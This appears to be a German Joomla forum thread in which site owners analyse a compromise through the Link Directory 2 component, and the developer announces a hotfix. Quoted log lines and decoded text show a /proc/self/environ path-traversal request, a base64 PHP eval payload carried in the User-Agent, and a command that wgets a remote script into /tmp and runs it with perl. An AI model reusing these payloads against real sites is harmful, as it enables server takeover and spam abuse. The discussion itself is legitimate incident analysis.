Thema: Seite wird seit drei Tagen gehackt

1.) Rechner ist mit Live CD / disinvect von heise gescannt

2.)

Log-Auswertung FTP-Server vom 19.-20.
344* /
184* /includes/js/logon.xyz-Angriff.html
39* /index.php?format=feed&type=atom
30* /index.php?format=feed&type=rss
18* /guestbook/
14* /xmlrpc/xyzAngriff.html
13* /component/adsmanager/?page=show_message_form&mode=0&adid=27
10* /?option=com_linkdirectory2&controller=../../../../../../../../../../../../../../../proc/self/environ¿
8* /wp-cron.php?doing_wp_cron
8* /ucp.php?mode=register
8* /suche
8* /?ls=jhG0o60d02

Log Auswertung 18.-19.4.
238* /includes/js/logon.xyzAngriff.html
94* /xmlrpc/xyzAngriff.html
70* /feed/
65* /index.php?format=feed&type=atom
44* /index.php?format=feed&type=rss
30* /guestbook/
16* /component/search/?searchword=suche
11* /wp-cron.php?doing_wp_cron
11* /component/adsmanager/?page=show_message_form&mode=0&adid=27
10* /suche


interessant ist: es gibt keinen Ordner: guestbook
Was davon könnte auf Sicherheitslücke hinweisen: Komponente: Linkdirectory? ist jetzt wieder deaktiviert worden um es einzukreisen

xyz-Angriff = die Seite die wiederum von meinem durch das Schad-Skript vom Rechner aus angegriffen wurde :(

Zitat von JuergenJoomla

1.) R/proc/self/environ¿
8* /wp-cron.php?doing_wp_cron

Hi,
ist da noch eine (alte) Wordpress Installation auf dem Server?

sag mal ist die Seite eigentlich noch online? Scheint mir fast so, wenn Du nun durch "rumprobieren" eine Lücke "einkreisen" willst.
Du hast bereits einen Hinweis bekommen, das über Deine Seite Phishing betrieben wird. Was muss noch passiert, damit die Seite wirklich vom Netz geht? Vielleicht KiPo-Seiten?
Leider kann man Dir nicht wirklich durchgreifend helfen, weil Infos nur bruchstückhaft kommen und wir keinen Einblick in die Logs haben.

Nachdem eine meiner Seiten heute nicht mehr zu erreichen war und ich zeitgleich hunderte "undelivered Mails to Sender" zurück bekommen habe, bin mal schnell auf die suche gegangen und bin in den Logfiles auch gleich fündig geworden.
In die Componente Linkdirectory2 in der Version 2.0.1 wurde anscheinend diverser Schadcode hochgeladen.
Im Logfile sieht eine von hunderten Zeilen in etwa so aus:
/component/linkdirectory2/link/?option=com_linkdirectory2&controller=..//..//..//..//..//..//..//..//..//environ%000 HTTP/1.1" 200 1570 "-" "<?eval(base64_decode('ZWNobyAiYzBsaSMiLnBocF91bmF tZSgpLiIjYzBsaSI7IGlmKEBjb3B5KCJodHRwOi8vd3d3dHRl1 hZ2F6aW5lLmNvbS9ibG9nL21vZHVsZXMvbW9kX2ZlZWQvZXJyb 3JfaWQiLCIvdG1wL2Jl amF0IikpIHsgZWNobyAiU1VDQ0VI7IH0= '));?>"

Decodiert wird daraus : echo "c0li#".php_uname()."#c0li"; if(@copy("***url entfernt***","/tmp/bejat")) { echo "SUCCESS"; }

eine ander decodierte Zeile sieht dann so aus:

system('rm -rf /tmp/xbot;wget ***ur entfernt*** /tmp/xbot;perl /tmp/xbot');


Meine php Kennisse reichen leider nicht aus um zu verstehen, wie die Jungs dann letztendlich meinen Account zum versenden von einigen tausend Mails benutzen konnten, vielleicht weiss jemand von Euch ja wie das geht.

Inzwischen gibt es ja die Linkdirectory2 Version 2.1.0, ist dort die Sicherheitslücke geschlossen?

Anton123

Hallo,

Zitat von Anton123

Eigentlich dachte ich am Dateialter sehen zu können in welcher Datei die waren, aber dem ist leider nicht so. Es gibt Datein die Monate alt sind und trotzdem haben die da erst gestern was eingeschleust.

das Dateierstellungsdatum läßt sich genauso manipulieren, ist also alles ander als aussagekräftig. Wenn Du eine Suchmaschine Deines Misstrauens bemühst, wirst Du die entsprechenden Info's und Tools dazu finden.

Im H2N Link Directory 2 gibt es in der Tat ein gravierendes Sicherheitsproblem. Ursache ist das nicht korrekte Auswerten der Variable controller, die zu den oben beschrieben Problemen führt. Ich habe ein Security Hotfix erstellt, der umgehend zu installieren ist. Details siehe dazu http://www.joomla-hklein.de/?p=967

Gruß, Harry Klein